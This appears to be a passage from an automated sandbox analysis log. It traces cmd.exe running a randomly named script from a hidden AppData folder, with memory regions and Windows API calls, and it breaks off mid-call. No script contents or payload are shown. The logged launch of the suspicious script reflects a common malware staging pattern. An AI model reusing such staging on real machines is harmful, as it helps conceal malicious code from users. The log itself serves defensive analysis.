"0xbbc" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1460 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1461 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1462 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 1463 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1464 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1465 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1466 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1467 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1468 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1469 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1636 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1637 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1638 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1639 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = 
"" Region: id = 1640 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1641 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1642 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1643 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1644 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1645 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1646 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1647 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1648 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1649 start_va = 
0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1650 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1651 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1652 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1653 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1654 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1655 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1656 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1657 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1658 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1659 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1705 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: 
"c:\\windows\\system32\\advapi32.dll") Region: id = 1706 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1707 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1708 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1709 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 31 os_tid = 0xbec [0100.073] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb5c | out: lpSystemTimeAsFileTime=0x22fb5c*(dwLowDateTime=0x79a7e520, dwHighDateTime=0x1d440a9)) [0100.073] GetCurrentProcessId () returned 0xbe8 [0100.073] GetCurrentThreadId () returned 0xbec [0100.073] GetTickCount () returned 0x23e85 [0100.073] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb54 | out: lpPerformanceCount=0x22fb54*=15686220301) returned 1 [0100.074] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0100.074] __set_app_type (_Type=0x1) [0100.074] __p__fmode () returned 0x76b331f4 [0100.074] __p__commode () returned 0x76b331fc [0100.074] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0100.074] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0100.074] GetCurrentThreadId () returned 0xbec [0100.075] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x38 
[0100.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0100.075] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0100.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.075] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.075] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22faec | out: phkResult=0x22faec*=0x0) returned 0x2 [0100.075] VirtualQuery (in: lpAddress=0x22fb23, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0100.075] GetConsoleOutputCP () returned 0x1b5 [0100.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 
[0100.076] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0100.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.076] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0100.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.076] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.076] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.077] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.077] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.077] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.077] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0100.078] GetEnvironmentStringsW () returned 0x320150* [0100.078] FreeEnvironmentStringsW (penv=0x320150) returned 1 [0100.078] GetEnvironmentStringsW () returned 0x320150* [0100.078] FreeEnvironmentStringsW (penv=0x320150) returned 1 [0100.078] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea5c | out: phkResult=0x22ea5c*=0x40) returned 0x0 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x0, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.078] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x0, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegCloseKey (hKey=0x40) returned 0x0 [0100.079] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea5c | out: phkResult=0x22ea5c*=0x40) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea64, 
lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x0, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x9, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x9, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x9, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegCloseKey (hKey=0x40) returned 0x0 [0100.079] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634d [0100.079] srand (_Seed=0x5b88634d) [0100.079] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"" [0100.079] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"" [0100.079] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3219b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0100.080] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.080] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.080] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0100.080] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.080] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0100.080] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0100.080] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0100.080] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0100.080] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0100.080] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0100.080] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0100.080] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0100.080] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0100.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f828 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f828, lpFilePart=0x22f824 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f824*="Desktop") returned 0x18 [0100.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.081] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0x31ffe0 [0100.081] FindClose (in: hFindFile=0x31ffe0 | out: hFindFile=0x31ffe0) returned 1 [0100.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0x31ffe0 [0100.081] FindClose (in: hFindFile=0x31ffe0 | out: hFindFile=0x31ffe0) returned 1 [0100.081] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0x31ffe0 [0100.081] FindClose (in: hFindFile=0x31ffe0 | out: hFindFile=0x31ffe0) returned 1 [0100.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.082] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0100.082] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0100.082] GetEnvironmentStringsW () returned 0x320150* [0100.082] FreeEnvironmentStringsW (penv=0x320150) returned 1 [0100.082] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.087] GetConsoleOutputCP () returned 0x1b5 [0100.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.087] GetUserDefaultLCID () returned 0x409 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f968, cchData=128 | out: lpLCData="0") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f968, cchData=128 | out: lpLCData="0") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f968, cchData=128 | out: lpLCData="1") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") 
returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0100.088] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0100.089] GetConsoleTitleW (in: lpConsoleTitle=0x3201e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0100.201] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0100.201] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0100.201] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0100.205] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", _String2=")") returned 58 [0100.205] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 3 [0100.205] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 3 [0100.205] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 6 [0100.205] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 6 [0100.206] _wcsicmp 
(_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 15 [0100.206] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 15 [0100.206] GetConsoleTitleW (in: lpConsoleTitle=0x22f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.207] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.207] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f41c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f414, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f414*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0100.207] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0100.207] SetErrorMode (uMode=0x0) returned 0x0 [0100.207] SetErrorMode (uMode=0x1) returned 0x0 [0100.208] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x32dc08, lpFilePart=0x22f180 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x22f180*="vMfCCeRYkvQy") returned 0x2d [0100.208] SetErrorMode (uMode=0x0) returned 0x1 [0100.208] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0100.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.213] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.213] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", fInfoLevelId=0x1, lpFindFileData=0x22ef1c, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef1c) returned 0x3208f0 [0100.213] FindClose (in: hFindFile=0x3208f0 | out: hFindFile=0x3208f0) returned 1 [0100.213] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0100.213] GetConsoleTitleW (in: lpConsoleTitle=0x22f3f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.213] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0100.216] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0100.216] IdentifyCodeAuthzLevelW () returned 0x1 [0100.222] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0100.222] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0100.222] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0100.222] CloseCodeAuthzLevel () returned 0x1 [0100.222] SetErrorMode (uMode=0x0) returned 0x0 [0100.222] SetErrorMode (uMode=0x1) returned 0x0 [0100.222] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", nBufferLength=0x104, lpBuffer=0x3204e8, lpFilePart=0x22f2e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", 